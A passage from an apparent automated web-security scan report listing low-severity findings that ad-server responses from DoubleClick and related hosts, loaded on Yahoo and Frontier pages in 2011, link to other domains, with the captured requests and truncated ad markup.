<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3b7a/4/20b/%2a/l;234033357;0-0;0;68150974;3011-200/33;39925598/39943385/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=trade_with_online_leader&SC=S047401&ch_id=D&s_id=YHOO&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_TradeFree_60Days_200x33.gif" border=0 alt="Advertisement"></a>

15.10. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.102

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.102;sz=120x30;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313052? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 936
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*http://ad.doubleclick.net/click;h=v8/3b7a/4/20b/%2a/d;234033383;0-0;0;68150985;47-120/30;39755442/39773229/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=trade_with_online_leader&SC=S047401&ch_id=D&s_id=YHOO&c_id=60DAYBT&o_id=60DAY+500"><img src="http://s0.2mdn.net/viewad/3003537/ET_TradeFree_60Days_120x30.gif" border=0 alt="Advertisement"></a>

15.11. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6067.160910.7443114402621/B5129127.36

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 12:48:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 1684
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=B-pnWhxZmTpD_HoHEjQSn6KCgBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gElaHR0cDovL2ZpbmFuY2UueWFob28uY29tL2xvb2t1cD9zPXhzc8ACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_3-vY6ePPfZqy3yfT7f37tFysnlxg&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk" target="_blank">
<img src="http://s1.2mdn.net/3017628/120x60_stk395_oldGrnBlkBttn.gif" border="0" alt=""/></a>
...[SNIP]...

15.12. http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6067.160910.7443114402621/B5129127.36

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 12:48:16 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 1834
X-XSS-Protection: 1; mode=block

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Template Id = 4,228 Template Name = HTML Image Banner + Optional Additional Tracking - [DFA] -->
<a href="http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk" target="_blank">
<img src="http://s1.2mdn.net/3017628/120x60_stk395_oldGrnBlkBttn.gif" border="0" alt=""/></a>
...[SNIP]...

15.13. http://ad.doubleclick.net/adj/N3880.SD153730.3880/B5030675.119  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.SD153730.3880/B5030675.119

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N3880.SD153730.3880/B5030675.119;dcove=o;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15vouek28/M=601209074.601714782.559298051.559295551/D=autos/S=96432900:LREC/Y=YAHOO/EXP=1315320341/L=XXxF8WKIR.bpARpjTl.wjQdiMhd7ak5mFfQADyzO/B=7FMXO0wNPEo-/J=1315313141053925/K=IjhCpA3igfxfZpP_HdMwtQ/A=2402166838162982702/R=1/X=3/*;ord=1315313141053925? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/darla/md.php?en=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37990
Date: Tue, 06 Sep 2011 12:45:42 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
document.write('<A TARGET="_blank" HREF="http://global.ard.yahoo.com/SIG=15vouek28/M=601209074.601714782.559298051.559295551/D=autos/S=96432900:LREC/Y=YAHOO/EXP=1315320341/L=XXxF8WKIR.bpARpjTl.wjQdiMhd7ak5mFfQADyzO/B=7FMXO0wNPEo-/J=1315313141053925/K=IjhCpA3igfxfZpP_HdMwtQ/A=2402166838162982702/R=1/X=3/*http://ad.doubleclick.net/activity;src%3D1659518%3Bmet%3D1%3Bv%3D1%3Bpid%3D59783911%3Baid%3D234411781%3Bko%3D0%3Bcid%3D42288790%3Brid%3D42306577%3Brv%3D2%3Bcs%3Dr%3Beid1%3D566971%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/108/%2a/x%3B234411781%3B4-0%3B0%3B59783911%3B4307-300/250%3B42288790/42306577/2%3B%3B%7Efdr%3D236038744%3B0-0%3B0%3B57126021%3B4307-300/250%3B40592756/40610543/1%3B%3B%7Esscs%3D%3fhttp://www.chevrolet.com/experience/fuel-efficiency/"><IMG SRC="http://s0.2mdn.net/1659518/PID_1675096_CHV_2011_MPG_Calculator_300x250.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.14. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTg2bTdrZShnaWQkc1hOamdHS0lQRTdwQVJwalRsLndqUU1tTWhkN2FrNW1Gb2dBQk1XQSxzdCQxMzE1MzEzMjg4MzcxODkyLHNpJDQ0NTc1NTEsdiQxLjAsYWlkJGFMZzZGa1BEbUxNLSxjdCQyNSx5YngkVXBnUmlkaE9ZWXZFcmhDZkcuSVhYdyxyJDAscmQkMTZpbmdndWY3KSk/1/*http://global.ard.yahoo.com/SIG=15kie638h/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=aLg6FkPDmLM-/J=1315313288456508/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=3672358318799275418/R=0/X=6/*;ord=1315313288.456508? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 39289
Date: Tue, 06 Sep 2011 12:48:09 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
document.write('<A TARGET="_blank" HREF="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTg2bTdrZShnaWQkc1hOamdHS0lQRTdwQVJwalRsLndqUU1tTWhkN2FrNW1Gb2dBQk1XQSxzdCQxMzE1MzEzMjg4MzcxODkyLHNpJDQ0NTc1NTEsdiQxLjAsYWlkJGFMZzZGa1BEbUxNLSxjdCQyNSx5YngkVXBnUmlkaE9ZWXZFcmhDZkcuSVhYdyxyJDAscmQkMTZpbmdndWY3KSk/1/*http://global.ard.yahoo.com/SIG=15kie638h/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=aLg6FkPDmLM-/J=1315313288456508/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=3672358318799275418/R=0/X=6/*http://ad.doubleclick.net/activity;src%3D3329470%3Bmet%3D1%3Bv%3D1%3Bpid%3D70522556%3Baid%3D245556936%3Bko%3D0%3Bcid%3D43793033%3Brid%3D43810820%3Brv%3D2%3Bcs%3Do%3Beid1%3D635384%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/233/%2a/g%3B245556936%3B0-0%3B0%3B70522556%3B4307-300/250%3B43793033/43810820/2%3B%3B%7Esscs%3D%3fhttps://www.facebook.com/SonsofAnarchy"><IMG SRC="http://s0.2mdn.net/3329470/PID_1727001_backup.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.15. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXZscjNiZShnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJExXXzZZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpbzBjdnU2KSk/1/*http://global.ard.yahoo.com/SIG=15kvd6qso/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=LW_6YkPDmLA-/J=1315313105704016/K=r8awXcUkJHjbbi3QZybcoQ/A=3672358318799275418/R=0/X=6/*;ord=1315313105.704016? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 39289
Date: Tue, 06 Sep 2011 12:45:07 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
document.write('<A TARGET="_blank" HREF="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXZscjNiZShnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJExXXzZZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpbzBjdnU2KSk/1/*http://global.ard.yahoo.com/SIG=15kvd6qso/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=LW_6YkPDmLA-/J=1315313105704016/K=r8awXcUkJHjbbi3QZybcoQ/A=3672358318799275418/R=0/X=6/*http://ad.doubleclick.net/activity;src%3D3329470%3Bmet%3D1%3Bv%3D1%3Bpid%3D70522556%3Baid%3D245556936%3Bko%3D0%3Bcid%3D43793033%3Brid%3D43810820%3Brv%3D2%3Bcs%3Do%3Beid1%3D635384%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/233/%2a/g%3B245556936%3B0-0%3B0%3B70522556%3B4307-300/250%3B43793033/43810820/2%3B%3B%7Esscs%3D%3fhttps://www.facebook.com/SonsofAnarchy"><IMG SRC="http://s0.2mdn.net/3329470/PID_1727001_backup.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.16. http://ad.doubleclick.net/adj/N6092.yahoo.com/B5098223.114  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6092.yahoo.com/B5098223.114

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adj/N6092.yahoo.com/B5098223.114;sz=300x250;dcopt=rcl;click=http://global.ard.yahoo.com/SIG=15p51oj0b/M=791180.14774018.14532197.7298264/D=music/S=791003591:LREC/Y=YAHOO/EXP=1315320573/L=3XUjIESO22TpARpjTl.wjQJWMhd7ak5mFtwADkWh/B=tTtUlEJe5mQ-/J=1315313373000253/K=cQx9gpXXfcj98RtyFfj6vQ/A=6474079/R=0/*;ord=0.6283681544009596? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 54705
Date: Tue, 06 Sep 2011 12:49:36 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
}
else {
document.write('<A TARGET="_blank" HREF="http://global.ard.yahoo.com/SIG=15p51oj0b/M=791180.14774018.14532197.7298264/D=music/S=791003591:LREC/Y=YAHOO/EXP=1315320573/L=3XUjIESO22TpARpjTl.wjQJWMhd7ak5mFtwADkWh/B=tTtUlEJe5mQ-/J=1315313373000253/K=cQx9gpXXfcj98RtyFfj6vQ/A=6474079/R=0/*http://ad.doubleclick.net/activity;src%3D2587596%3Bmet%3D1%3Bv%3D1%3Bpid%3D66874147%3Baid%3D245308072%3Bko%3D0%3Bcid%3D43561363%3Brid%3D43579150%3Brv%3D1%3Bcs%3Dl%3Beid1%3D555469%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/f2/%2a/k%3B245308072%3B0-0%3B0%3B66874147%3B4307-300/250%3B43561363/43579150/1%3B%3B%7Esscs%3D%3fhttp://www.ramtrucks.com/hostc/bmo/models.do?modelYearCode=CUT201113&zipCode=&sid=888357&pid=66874147&adid=245308072&channel=display"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/2587596/PID_1706756_Country_300x250_ExpandEndFrame.jpg" width="300" height="250" BORDER=0 alt= "'+ altImgAltText +'"/></A>
...[SNIP]...

15.17. http://ad.doubleclick.net/adj/ober.frontier/product_119282623  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ober.frontier/product_119282623

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ober.frontier/product_119282623;sz=300x160;ord=278143426403403.28? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 376
Date: Tue, 06 Sep 2011 12:50:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/j;220083469;0-0;0;70766983;5467-300/160;34511822/34529700/1;;~okv=;sz=300x160;~sscs=%3fhttp://games.frontier.com/game.htm?code=117718267&RefId=FR300x160"><img src="http://s0.2mdn.net/viewad/2566764/300x160_treasure_of_serengeti.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.18. http://ad.doubleclick.net/adj/ober.frontier/product_undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ober.frontier/product_undefined

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/ober.frontier/product_undefined;sz=300x160;ord=8383746361359954? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 376
Date: Tue, 06 Sep 2011 12:45:30 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/g;220083469;0-0;0;43698690;5467-300/160;34511822/34529700/1;;~okv=;sz=300x160;~sscs=%3fhttp://games.frontier.com/game.htm?code=117718267&RefId=FR300x160"><img src="http://s0.2mdn.net/viewad/2566764/300x160_treasure_of_serengeti.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.19. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

